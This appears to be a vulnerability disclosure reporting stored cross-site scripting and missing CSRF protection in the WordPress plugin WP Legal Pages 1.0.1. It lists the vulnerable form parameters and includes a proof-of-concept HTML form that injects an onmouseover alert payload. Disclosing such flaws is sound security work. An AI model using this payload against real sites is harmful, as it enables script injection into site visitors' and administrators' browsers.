Hello,

Plugin: WP Legal Pages 1.0.1 https://wordpress.org/plugins/wplegalpages/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=legal-pages

Vulnerable parameters: lp-domain-name, lp-business-name, lp-phone, lp-street, lp-city-state, lp-country, lp-email, lp-address, lp-niche

Example PHP callstack:

/wplegalpages/adminSetting.php:91

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=legal-pages" />

<input type="text" name="lp-gsubmit" value='Save' />

<input type="text" name="lp-domain-name" value='" onmouseover=alert(1) />'>

<input type="submit" />

</form>

--